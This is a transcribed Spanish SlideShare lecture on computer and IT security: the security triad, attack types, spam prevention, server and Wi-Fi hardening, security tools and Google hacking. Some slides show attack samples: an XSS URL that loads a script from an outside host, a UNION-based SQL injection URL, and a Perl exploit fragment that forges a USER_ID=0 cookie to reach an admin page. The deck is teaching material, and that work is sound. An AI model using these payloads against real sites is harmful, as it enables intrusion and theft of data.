Seguridad informática y de ti

1,500 views
1,362 views

Published on

Items de seguridad en los Sistemas de Información

Published in: Education
0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,500
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide

Seguridad informática y de ti

  1. 1. Seguridad Informática y de TI
  2. 2. Seguridad Informática: La seguridad en informática consiste en asegurar quelos recursos del sistema de información, como data,servicios o programas de una organización, seanutilizados de la manera que se decidió y que el acceso ala información allí contenida, así como su modificación,sólo sea accesible a las personas que se encuentrenacreditadas y dentro de los límites de su autorización.
  3. 3. CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICANo existe la absoluta seguridad !! Todo es rompible si se le aplica fuerza. Una caja de vidrio se puede romper, pero también una caja fuerte de titanio. ¿Qué es más seguro: la caja de vidrio o la de titanio? Evidentemente la de titanio, pero esto depende solamente de que herramienta utilicemos para romperla. Todo se puede vulnerar. La única razón por la cual utilizamos rejas de fierros en nuestras casas y los bancos es porque hace que el ataque sea más lento.
  4. 4. Debemos enfocarnos en REDUCIR EL RIESGO, y no entratar de eliminar las amenazas, ya que es imposible.Para eso debemos saber de QUE o QUIENES nosprotegemos y también COMO nos atacan.
  5. 5. “Si te conoces a ti mismo yconoces a tu enemigo, entoncesno deberás temer el resultado de mil batallas” Sun-Tzu, El Arte de la Guerra
  6. 6. ¿De donde surge la seguridad?• “Tecnológicamente, la seguridad es GRATIS” – YA HAS PAGADO POR ELLA: Los sistemas operativos modernos contienen muchas características de seguridad. ¿Las conoces?¿Las usas? – LAS MEJORES HERRAMIENTAS DE SEGURIDAD SON OPEN SOURCE. (excepto los antivirus)
  7. 7. Metas en la seguridad Integridad: La información sólo puede ser modificada por quien está autorizado y de manera controlada. Confidencialidad: La información sólo debe ser legible para los autorizados. Disponibilidad: Debe estar disponible cuando se necesita. Irrefutabilidad (No repudio): El uso y/o modificación de la información por parte de un usuario debe ser irrefutable, es decir, que el usuario no puede negar dicha acción.
  8. 8. Componentes de Seguridad• Seguridad Fisica = Proteger de acceso fisico a personas no autorizadas.• Seguridad Operacional = Medidas de seguridad aplicadas a las operaciones del negocios.(Access c control,autenticazion, backups y disaster recovery)• Seguridad Administrativa = Esta es la parte del triangulo donde se implementan las guias, reglas y procedimientos a nivel administrativo. ( (politicas,requerimientos de software,Etc..)
  9. 9. ¿Qué es Vulnerabilidad?• Un agujero de seguridad es un fallo en un programa que permite mediante su explotación violar la seguridad de un sistema informático.• Una vulnerabilidad por lo general permite que el atacante pueda engañar a la aplicación, por ejemplo, esquivando los controles de acceso o ejecutando comandos en el sistema donde se aloja la aplicación.• UNO DE LOS BAKDOORS MAS FAMOSOS LOS TUVO WINDOWS XP Aquí recordaremos aquel agujero de seguridad de Windows a través de los temporales de internet (2007)
  10. 10. Otro ejemplo de vulnerabilidad (no tanrelevante, pero igual interesante) Con ustedes el buscaminas
  11. 11. Factores que hacen a un sistema más vulnerable  Código sin confirmar - Un código en un diskette, en CD-ROM o USB, se puede ejecutar por la irresponsabilidad o ignorancia del usuario.  Defectos - La mayoría de los sistemas contienen errores que se pueden aprovechar por el malware, mientras no se ponga el parcho correspondiente.  Homogeneidad - Cuando todas las computadoras en una red funcionan con el mismo sistema operativo, si pueden corromper ese SO, podrán afectar cualquier computadora en el que funcione.  Sobre-privilegios del código - La mayoría de los sistemas operativos permiten que el código sea ejecutado por un usuario con todos los derechos.  Sobre-privilegios del usuario - Algunos sistemas permiten que todos los usuarios modifiquen sus estructuras internas.
  12. 12. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
  13. 13. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Ataques Internos - Premeditación (Empleados mal intencionados o ex empleados con información privilegiada) - Descuido - Ignorancia - Indiferencia de las politicas de seguridad Ataques externos -- Hackers, Crackers, Lammers, Script-Kiddies -- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.
  14. 14. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Ataques Internos • Suplantación de identidad • Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR) • Robo de información (Ej: para la competencia) • Virus, Troyanos, Gusanos • Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc Keylogging - Keycatching Keycatcher:
  15. 15. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Ataques Externos • Ataques contra servicios WEB • Cross Site Scripting (XSS) • SQL Injection • Exploits • Robo de Identidad • Denegación de Servicio (DoS) y Denegación de Servicio Distribuido (DDoS) • SPAM • VIRUS • Phishing (Whishing, Hishing) • Troyanos
  16. 16. XSSSEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
  17. 17. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEBXSS:http://docs.info.apple.com/article.html?artnum=;a=document.createElement(script);a.src=http://h4k.in/i.js;document.body.appendChild(a);//;alert(1)//%22;alert(2)//%22;alert(3)//--%3ESQL Injection:http://www.sitiovulnerable.com/index.php?id=10 UNION SELECTTOP 1 login_name FROM admin_login--
  18. 18. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEBEjemplo de un exploit en PERL: #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host=shift; if ($host eq "") { print "Usage: webeye-xp.pl <host name>n"; exit; } my $browser = LWP::UserAgent->new(); my $resp = $browser->get("http://$host/admin/wg_user- info.ml","Cookie","USER_ID=0; path=/;"); $t = $resp->content; #print $t; ";
  19. 19. Algo breve sobre CookiesLas cookies son pequeños archivos de texto que el navegador almacena en el ordenador del usuario, cuando se visitan páginas Web.• Las cookies almacenan información que se utiliza con varios fines: • Para personalizar la página Web y su navegación para cada usuario. • Para recoger información demográfica sobre cuántos usuarios visitan la página y su tiempo de estancia en ella. • Para realizar un seguimiento de qué banners se muestran al usuario, y durante cuánto tiempo.• Estos usos no tienen un carácter malicioso, al menos en principio. Sin embargo, es necesario tener en cuenta que toda información personal que se introduzca en una página Web se puede almacenar en una cookie, incluyendo el número de la tarjeta de crédito.• Además, las cookies también se pueden utilizar para formar un perfil del usuario, con información que éste no controla, y que después puede ser enviada a terceros, con la consiguiente amenaza para la privacidad.
  20. 20. Y ya hablamos de exploit, hablemos de: El Script boy o Script KiddieDefinición. Persona que presume de ser un hacker o cracker sin que posea un gradode conocimientos suficientes. Usa normalmente cracks, exploits y programassimilares construidos por personas con grandes conocimientos pero cuyo uso está alalcance de cualquiera.Para ahora recordar los exploits, como antaño
  21. 21. Veamos que llegó
  22. 22. El delito ya esta cometido ahora elatacante revisa su correo,el que uso para recibir lacontraseña de la victima
  23. 23. Contraseña e IP
  24. 24. Esta fue una de las maneras más usadas para obtener la contraseña deotra persona de las muchas maneras que se pueden usar como:KEYLOGERS programas que capturan todo lo que se hace por el tecladoO algunas personas aprovechan las vulnerabilidades de Windows y losAgujeros de seguridad para obtener la ansiada contraseña por ejemploDesencriptar el registro de Windows para abrir un cookie
  25. 25. Brevemente:Los Keylogger Programa que intercepta todas las pulsacionesrealizadas en el teclado (e incluso a veces tambiénel Mouse), y las guarda en un archivo para obtenerdatos sensibles como contraseñas, etc. Este archivopuede ser enviado por un troyano a un usuario dePC, vía mail, chat o descargando un archivo exe.
  26. 26. Brevemente: El Spyware• Los programas espía, también conocidos como spyware, son aplicaciones informáticas que recopilan información personal del usuario sin su consentimiento, como por ejemplo software presente en el ordenador, hábitos de uso de Internet, páginas visitadas, etc. Posteriormente, transmiten esta información a terceros, tales como empresas de publicidad u otras compañías interesadas en dichos datos, con la consiguiente violación de la privacidad.• Los programas espía llegan al ordenador a través de distintas vías: mediante un troyano, que los instala sin consentimiento del usuario; cuando se visita una página Web que incluye determinados controles ActiveX o código que explota una determinada vulnerabilidad.• Además de las acciones descritas, el spyware tiene una serie de efectos colaterales: consume recursos del sistema, ralentiza el funcionamiento del ordenador, causa fallos en el sistema, etc.
  27. 27. Y más brevemente:Los backdoors• (Puerta trasera) Defecto en un software o página Web que permite ingresar a una determinada parte de los mismos que usualmente está restringida a un usuario ajeno. No siempre es un defecto (bug), también puede ser una entrada secreta de los programadores o webmasters con diversos fines. Ej.: una página Web tiene clave de acceso para ingresar, pero existe una determinada dirección que nos permite entrar saltando la misma. Uno de los más usados es Back Orifice creado específicamente para entrar en sistemas operativos Windows usando troyanos.
  28. 28. Y super breve: El Phishing• El phishing consiste en el envío de correos electrónicos que, aparentando provenir de fuentes fiables (por ejemplo, entidades bancarias), intentan obtener datos confidenciales del usuario. Para ello, suelen incluir un enlace que, al ser pulsado, lleva a páginas Web falsificadas. De esta manera, el usuario, creyendo estar en un sitio de toda confianza, introduce la información solicitada que, en realidad, va a parar a manos del estafador.
  29. 29. En este ejemplo, el propio correo incluye un formulario en lugar de ofrecer un enlace auna página falsa. Si el usuario introduce sus datos y envía el formulario, estos sonfinalmente recogidos en un servidor ubicado en Taiwán.
  30. 30. Y QUE HAY DEL SPAM 72% del correo electrónico mundial es Spam Fuente:Ironport, 2010. Objetivos: ▪ Ganar Notoriedad • Dañar empresas internacionales • Recolectar datos (ratware, pictionary, spiders, crawlers) • Cometer delitos (spoofing, pishing, etc.) • Publicidad pagada por el usuarios y a costo mínimo para el emisor Beneficios: • De tipo económico * Contratados por empresas * Venta de datos • Reconocimiento¿POR QUÉ EXISTE?ES UN NEGOCIO QUE GENERA PUBLICIDAD Y BENEFICIOS ECONÓMICOS CASI SINCOSTO ¡¡¡¡UN SPAMMER PUEDE GANAR 8000 USD POR DÍA!!!! Fuente: Reporte Resultados Reunión Busan, Task Force on Spam OECD, Septiembre 2010.
  31. 31. CONSECUENCIAS DEL SPAM GENERA IMPORTANTES COSTOS • Daña la productividad • Daña la competitividad de las empresas * Tiempo de entrega y respuesta * Confiabilidad Uso inútil de banda ancha Daño a la infraestructura informática Denegación servicio por saturación Transmisión de virus y gusanos • Juicios Pérdida de recursos por los que paga (saturación) A Usuarios Paga publicidad que no solicito Pérdida de información por combate (sobrefiltrado) Traslado de costos de combate por ISPs Costos por Ancho de Banda A ISPs Costos por inversión en herramientas para su combate Costos en imagen IMPLICACIÓN DEL SPAM EN LAS TELECOMUNICACIONES Existe un daño con respecto a la operación segura de las redes públicas de telecomunicaciones y al uso eficiente de su capacidad y recursos para su mejor aprovechamiento, logrando servicios de telecomunicaciones de calidad, en beneficio de los usuarios
  32. 32. PREVENCIÓN•No abras y elimina todo mensaje cuyo título o emisor (personas o empresas)te resulte sospechoso o desconocido;•Sé cuidadoso al abrir los archivos adjuntos, pueden contener virus que seactivan al abrirlos;•Instala un firewall y un antivirus. Actualízalos frecuentemente;•Instala un filtro de Spam o suscríbete al de tu prestador de servicios deinternet;•Utiliza diversas direcciones de correo, por ejemplo, una cuenta de trabajo yuna cuenta personal solo para mensajes a personas confiables y conocidas;•Si te es solicitada información confidencial mediante mensaje aparente de tubanco o compañía crediticia, verifica su veracidad por teléfono.•Si envías mensajes a un gran número de destinatarios, usa el campo de copia ciega BCC, de esta forma las direcciones noson visibles a otros;•Usa un programa de encriptación para tus mensajes, así aseguras que el contenido sólo sea visto por el destinatario;•No compres, ni respondas a mensajes comerciales de empresas dudosas. No respondas solicitando tu eliminación de lalista, con ello aseguras al spammer la validez de tu cuenta de correo, lo que llevará a que aparezca en más listas y basesde datos;•No respondas a cadenas o a reportes de falso virus (hoax), ni atiendas a sus solicitudes de reenvío. Estos reportes teimpulsan a tomar supuestas medidas contra el virus, que en realidad te llevarán a provocar daños a tu equipo;•Verifica siempre la necesidad e identifica la identidad real del destinatario cuando proporciones tu información confidencialvía Internet o e-mail;•Considera siempre a quién proporcionas tus datos de contacto, tales como dirección de correo electrónico o númerocelular, previniendo quién podría tener acceso a él después.
  33. 33. CONVIRTIENDO NUESTROS SERVICIOS EN FORTALEZAS
  34. 34. LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD Siempre respetar las políticas de seguridad Siempre tener nuestros servicios actualizados a la última versiónconocida estable Utilizar mecanismos de criptografía para almacenar y transmitirdatos sensibles Cambiar las claves cada cierto tiempo Auto-auditar nuestros propios servicios. Autoatacarnos para sabersi somos o no vulnerables Estar siempre alerta. Nunca pensar ”a nosotros nadie nos ataca”. No dejar respaldos con información sensible en directorios web No usar las mismas claves para servicios distintos (ej, la clave deroot sea la misma que la de MySQL)
  35. 35. SERVICIOS DE INTERNET - Cambiar los puertos por defecto - Garantizar el acceso solo a cuentas específicas - Aplicar técnicas de Hardening - Para servicios privados y confidenciales utilizar túneles seguros (VPNcifradas) en Internet y redes no seguras - Eliminar todos los banners posibles y sobre todo las versiones - Habilitar módulos de seguridad (Ej mod_security en Apache) - Levantar Firewalls e IDS/IPS - Crear cuentas de sistema restringidas (aunque no tengan privilegios)
  36. 36. SERVICIOS DE INTERNET - Nunca trabajar con ”root” si no es estrictamente necesario - Proteger con doble contraseña si es posible - Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números ycaracteres especiales. Las claves no deben ser palabras coherentes (ej: Admin25) - Cerrar puertos y eliminar aplicaciones innecesarias - Borrar robots.txt y estadísticas públicas - Proteger las URL (ej: mod_rewrite)
  37. 37. SERVICIOS DE INTERNET - Tener cuidado con los archivos temporales en directorios WEB. Ejemplo:index.php~ (terminados en caracter “squiggle” o “pigtail (literalmente: cola dechancho)” - Realizar respaldos periódicamente y probar que funcionen - Conocer las técnicas de ataque más conocidas- Auditar los códigos con herramientas de seguridad- Si ejecutan algún servidor de base de datos, permitir solamente comunicación coninterfaz loopback y no dejar sin contraseña las bases de datos.- En lo posible no utilizar servicios como: - WEBMIN - phpMyAdmin - Interfaces WEB en routers o dispositivos de red
  38. 38. UN POCO MAS DE SEGURIDAD CON APACHE Y PHPApache. En httpd.conf activar las siguientes directivas:ServerTokens ProdServerSignature OffServerAdmin <direccion@decorreo.com>habilitar mod_security y mod_rewritePHP .En php.iniphp_expose=off“esconde php”mode_safe=onevita que se ejecuten funciones como system(), passthru(), exec(), etc.evitar scripts con phpinfo();
  39. 39. Algunos ejemplos:
  40. 40. Algunos ejemplos:Dirección: http://www.sitioweb.com/config.php ESTA PAGINA ES PRIVADA
  41. 41. Algunos ejemplos:Dirección: http://www.sitioweb.com/config.php~ <?php /*Variables base de datos*/ $sys[db_host] = "localhost"; $sys[db_username] = "root"; $sys[db_password] = "123"; $sys[db_database] = "base_de_datos"; echo "<center>ESTA PAGINA ES PRIVADA"; ?>
  42. 42. Algunos ejemplos:Solución al problema anterior: UN CRON QUE ELIMINE LOS ARCHIVOSTEMPORALES /etc/crontab */5 * * * * root rm /var/www/*.*~
  43. 43. PROTECCIÓN DE REDES WI-FI
  44. 44. PROTECCIÓN DE REDES WI-FIEL GRAN PROBLEMA DE LAS REDES WI-FI ES GRANEXTENSIÓN FÍSICA (No hay cables) LO QUE CONLLEVA A QUESEA MÁS FÁCIL ACCEDER A ELLAS REMOTAMENTEEXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMARPARA REDUCIR EL RIESGO DE ATAQUES.
  45. 45. PROTECCIÓN DE REDES WI-FI Apagar el router o access point cuando no se ocupe Nunca entregar la clave Wi-Fi a terceros Utilizar claves de tipo WPA2. Como segunda opción WPA y en el peorde los casos WEP (128 y 64 bits) Habilitar el control de acceso por MAC. Son fáciles de clonar pero poneuna barrera más Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH,etc) Deshabilitar el acceso inalámbrico a la configuración Cambiar los puertos por defecto de los servicios necesarios en el router(ej: http a 1000) Desactivar el broadcasting SSID Desactivar DHCP. Utilizar sólo IP manuales dentro de rangos pococonvencionales. (Ej: 90.0.10.0 – 90.0.10.254) Usar VPN si fuese posible.
  46. 46. PROTECCIÓN DE REDES WI-FI Cambiar regularmente las claves Wi-Fi (tanto administración comoclave de red). Guardar bien las claves de administración Usar contraseñas complicadas. (Ej: E_aR@_1-x No usar dispositivos Wi-Fi cerca de hornos microondas ni teléfonosinalámbricos Realizar un scaneo local de las redes disponibles para evitarinterferencias.LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11
  47. 47. HERRAMIENTAS DE SEGURIDAD
  48. 48. HERRAMIENTAS DE SEGURIDAD COMERCIALESGFI LANGUARD SECURITY SCANNERwww.gfi.com ACUNETIX WEB SCANNER www.acunetix.comN-Stalker (ex N-Stealth)www.nstalker.com
  49. 49. HERRAMIENTAS DE SEGURIDAD GRATISNMAP (Network Mapper)www.insecure.org/nmap NESSUS www.nessus.org
  50. 50. Scanners de vulnerabilidades• Esto es una herramienta que permite escanear una computadora en una red para vulnerabilidades ya conocidas.• Estas vulnerabilidades pueden ser tanto en la red como en el sistema operativo y en aplicaciones.• Ej: Nessus,GFI LANguard,Retina,Sara.
  51. 51. Nessus
  52. 52. Password Cracker• Es el proceso de recuperar el password de data almacenada y/o transmitida por una computadora o dispositivo electrónico.• Vectores de ataques: Encripción debil, Adivinar, Ataques por diccionarios,Fuerza Bruta (Brute Force).• Ej. Cain and Abel, John the Ripper,THC Hydra y L0phtcrack.
  53. 53. Cain y Abel
  54. 54. Packet sniffer• Esto es una herramienta que permite capturar los paquetes de datas que son transmitidos en una red.• Estos tambien se utilizan en conjunto a password crakers.• Ej.Wireshark, Kismet ,Tcpdump,Ettercap y Cain and Abel.
  55. 55. Wireshark
  56. 56. Spoofing attacks• En esta situación el atacante logra fingir ser un servidor o un equipo o una aplicación para lograr que sus victimas se comuniquen con el y no con el destinatario real.• Man-in-the-middle attack y URL spoofing dsniff,Karma,AirJack,Ettercap y Cain and Abel.
  57. 57. Ettercap
  58. 58. Y para mayor INSEGURIDAD: Google Hacking¿Qué es el Google Hacking? Ejemplos• Muchos de ustedes se preguntaran qué es eso del Google Hacking?? Es bien sencillo. El Google Hacking consiste en explotar la gran capacidad de almacenamiento de información de Google, buscando información específica que ha sido añadida a las bases de datos del buscador. Si las búsquedas las orientamos a ciertas palabras clave que nos ayuden a encontrar información sensible, puntos de entrada sensibles a posibles ataques, o cualquier otro tipo de información que tuviera carácter de sensibilidad, estaremos ejecutando un Google hack. Resumiendo: Google Hacking es buscar en Google información sensible, generalmente, con fines maliciosos.
  59. 59. Ejemplo
  60. 60. Ejemplo – Datos personales - direcciones de correo – telefonos – informacion personal
  61. 61. Ejemplo – Directorios sensibles
  62. 62. Ejemplo – ficheros que contienen claves
  63. 63. Ejemplo – Hardware online
  64. 64. Ejemplo – deteccion de servidores Web
  65. 65. Google Hacking• Mediante esta técnica, es posible encontrar información sobre : – Productos vulnerables – Mensajes de error – Ficheros que contienen información sensible – Ficheros que contienen claves – Ficheros que contienen nombres de usuario – Footholds e información de apoyo al acceso – Páginas con formularios de acceso – Páginas que contienen datos relativos a vulnerabilidades – Directorios sensibles – Información sensible sobre comercio y banca electrónica – Dispositivos hardware online – Ficheros vulnerables – Servidores vulnerables – Detección de servidores web
  66. 66. Google Hacking¿Cómo impedir ser víctimas deGoogle Hacks?
  67. 67. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks?1. Aprenda cómo funciona Google. Conozca y experimente las posibilidades de la búsqueda avanzada. Entienda que las búsquedas son muy refinables y que es un motor de búsqueda muy poderoso, que no sólo está pensado para ordenar y encontrar páginas web, sino que también pueden hallarse documentos ofimáticos, informes, faxes, memorandos, notas, fotografías, teléfonos … es decir, absolutamente todo lo que sea accesible puede acabar en las bases de datos de Google.
  68. 68. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks?1. Una vez entendido el punto primero, entienda que igual que podemos usar Google para hallar documentos inocuos, podemos emplearlo para obtener documentos con datos sensibles. Grábeselo en la cabeza. Hay gente que vive de este tipo de técnicas y de la información que extrae de ellas.
  69. 69. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks?1. Si dispone de página web, asegúrese de comprender lo importante que es tener un fichero de robots.txt correctamente configurado. Tener una página web es algo más que colocar fotos y documentos en la Red para que las vean los amiguetes. Nuevamente incidimos en que todo lo que se coloca en servidores Web es susceptible de acabar siendo indexado en las bases de datos de Google. Esto es aplicable para cualquier objeto accesible desde documentos Web: cámaras web, impresoras, etc.
  70. 70. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks?• No deje de consultar los parámetros que definen el mecanismo de posicionamiento de resultados en Google. Aplique “posicionamiento inverso” a todo aquello que quiera mantener lejos de ojos ajenos. Puestos a aparecer, mejor aparecer en el puesto doscientos que en el quinto. No está de más usar el buscador para aprender cómo funciona el Google hacking y aplicar técnicas de inversión aplicadas a su caso.
  71. 71. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks?• Si usted tiene un buen nivel técnico y administra máquinas corporativas, quizás debería plantearse no sólo la revisión de las políticas de exclusión de robots, sino además, debería probar un honeypot especializado. Le proponemos Google Hack Honeypot. Funciona muy bien y le brindará información interesante sobre Google hackers que intenten explotar en sus sitios Web este tipo de técnicas2. Sería recomendable también que leyera documentos con ideas sobre este honeypot, en caso de que opte por emplearlo.
  72. 72. Google Hacking• Que es un Honeypot?? – Se denomina Honeypot al software o conjunto de computadores cuya intención es atraer a crackers o spammers, simulando ser sistemas vulnerables o débiles a los ataques. Es una herramienta de seguridad informática utilizada para recoger información sobre los atacantes y sus técnicas. Los Honeypots pueden distraer a los atacantes de las máquinas más importantes del sistema, y advertir rápidamente al administrador del sistema de un ataque, además de permitir un examen en profundidad del atacante, durante y después del ataque al honeypot.
  73. 73. Google Hacking Honeypot• Algunos honeypots son programas que se limitan a simular sistemas operativos no existentes en la realidad y se les conoce como honeypots de baja interacción y son usados fundamentalmente como medida de seguridad. Otros sin embargo trabajan sobre sistemas operativos reales y son capaces de reunir mucha más información; sus fines suelen ser de investigación y se los conoce como honeypots de alta interacción.
  74. 74. Google Hacking Honeypot• Un tipo especial de honeypot de baja interacción son los sticky honeypots ( honeypots pegajosos) cuya misión fundamental es la de reducir la velocidad de los ataques automatizados y los rastreos.• En el grupo de los honeypot de alta interacción nos encontramos también con los honeynet.• También se llama honeypot a un website o sala de chat, que se ha creado para descubrir a otro tipo de usuarios con intenciones criminales,
  75. 75. PARA REFLEXIONAR• NOS HEMOS PUESTO A PENSAR QUE PODEROSO ES GOOGLE – Y QUE IMPRESCINDIBLE EN NUESTRA VIDA WEB.• MICROSOFT ES UN GIGANTE, PERO EN LA RED EL QUE MANDA ES GOOGLE.• Y LA INTERROGANTE ES: ¿HASTA DONDE LLEGARA GOOGLE? ¿CUANTO DEPENDEREMOS DE EL EN UN FUTURO?
  76. 76. Tema aparte: los Crackers Aquí algunos FamososFred Cohen Robert Tappan Morris Kevin David Mitnick Chen Ing- Hou (maestro)
  77. 77. Herramientas usadas por los crackers• Las herramientas de cracking son los programas y aplicaciones que ayudan al cracker a lograr su fin, aunque estos programas no necesariamente debieron estar diseñados para ese fin específico.• Categorías: – Desensamblador – Ensamblador – Depurador (debugger) – Editor hexadecimal – Compilador
  78. 78. Herramientas usadas por los crackers• Desensamblador – Un desensamblador es un programa de computación que traduce desde lenguaje máquina (código binario) al lenguaje de programación (assembler). – El programa desensamblador a utilizar, por trabajar con lenguaje máquina y ensamblador, depende exclusivamente del microprocesador que estamos usando (para que pueda reconocer las instrucciones del código binario), de la arquitectura de la máquina y del sistema operativo en uso (no es lo mismo Windows que Linux).
  79. 79. Herramientas usadas por los crackers• Ensamblador – El término ensamblador (del inglés assembler) se refiere a un tipo de programa informático que se encarga de traducir un fichero fuente escrito en un lenguaje ensamblador, a un fichero objeto que contiene código máquina, ejecutable directamente por la máquina para la que se ha generado. El propósito para el que se crearon este tipo de aplicaciones es la de facilitar la escritura de programas, ya que escribir directamente en código binario, que es el único código entendible por la computadora, es en la práctica imposible. La evolución de los lenguajes de programación a partir del lenguaje ensamblador originó también la evolución de este programa ensamblador hacia lo que se conoce como programa compilador.
  80. 80. Herramientas usadas por los crackers• Depurador• Un depurador (en inglés, debugger), es un programa que permite depurar o limpiar de errores otro programa informático.• Ejemplos de depuradores: – GNU Debugger (gdb) – SoftICE – OllyDbg – Trw2000 – Ida Pro
  81. 81. Herramientas usadas por los crackers• Editor hexadecimal• Un editor hexadecimal (o editor de archivos binarios) es un tipo de programa de ordenador que permite a un usuario modificar archivos binarios. Los editores hexadecimales fueron diseñados para editar sectores de datos de disquetes o discos duros por lo que a veces se llaman "editores de sectores".• Utilizando un editor hexadecimal un usuario puede ver o puede redactar el contenido intacto y exacto de un archivo al contrario que con la interpretación del mismo contenido que otro, de nivel más alto software de aplicaciones puede asociar por la extensión de archivo. Por ejemplo, los datos intactos de la imagen (los raws), y la manera de interpretar el mismo archivo del software de edición de imágenes.• En la mayoría de los editores hexadecimales los datos del archivo son representados como valores hexadecimales agrupados en dos grupos de 8 bytes y un grupo de 16 caracteres ASCII, los caracteres no reconocidos son representados normalmente por un punto "." en ASCII.• El estándar comando Unix shell es usado para mostrar (aunque no editar) un archivo en hexadecimal y octal es od.
  82. 82. Editor hexadecimal ICY Hexplorer
  83. 83. Herramientas usadas por los crackers• Compilador – Un compilador es un programa que, a su vez, traduce un programa escrito en un lenguaje de programación a otro lenguaje de programación, generando un programa equivalente. Usualmente el segundo lenguaje es código máquina, pero también puede ser simplemente texto. Este proceso de traducción se conoce como compilación. – La razón principal para querer usar un compilador es querer traducir un programa de un lenguaje de alto nivel, a otro lenguaje de nivel inferior (típicamente lenguaje máquina). De esta manera un programador puede diseñar un programa en un lenguaje mucho más cercano a como piensa un ser humano, para luego compilarlo a un programa más manejable por una computadora.
  84. 84. Pero también debemos hablar de TEMAS MAYORES
  85. 85. Cyber Terrorismo Es un término controversial Definición mayormente aceptada = Es el uso predeterminado de actividades perjudiciales o amenazas a sistemas de computadoras o networks con la intención de causar daño o avanzar su causa política, sociales, religiosa o ideológica.
  86. 86. Cyber Warfare Cyber Warfare = Es el uso de computadoras y el internet para conducir guerra o guerrillas en el cyberespacio. Cyber Guerrero = Individuo alta mente versado en las áreas de: programación, seguridad informática, redes, espionage y computer forensics. Gobiernos, Ejércitos y agencias de la ley están entrenando en grandes cantidades a sus miembros en estas áreas.
  87. 87. PARA TENER SIEMPRE EN CUENTA…• Que no todos los ataques o problemas de seguridad son sofisticados, a veces son meros engaños simples (“viveza” o “criollada” acá en Perú), como la llamada Ingeniería Social (un término más bonito, o como dicen “más cool”, o mejor dicho más técnico)
  88. 88. Pero definitivamente lo más dramático• Es recordar que la seguridad de TI no sólo se puede y debe reducir a un ámbito empresarial, sino que también debe incluir el ámbito social colectivo, pues lamentablemente las TI son tan poderosas que pueden ser usadas tanto para hacer lo correcto, como lo incorrecto y hasta lo más indignante como la Pornografía Infantil y la Trata de Personas.• Veamos las dos caras del uso de las TI
  89. 89. PARA FINALIZAR… SIEMPRE RECUERDA…
  90. 90. • Cerca del 80% de los ‘ataques’ provienen del interior. • No se notifican todos los ataques que se reciben. • Muchos accidentes humanos se reportan como ataques.• No es eficiente hacer una alta inversión puntual y olvidarse durante untiempo.
  91. 91. • La seguridad es un proceso, un camino continuo.• Se tiene que diferenciar de lo que hay que protegerse.  Errores involuntarios. (Maquinaria y personal)  Ataques voluntarios. (Internos y externos)  Desastres naturales.
  92. 92. ¿¿PREGUNTAS??

×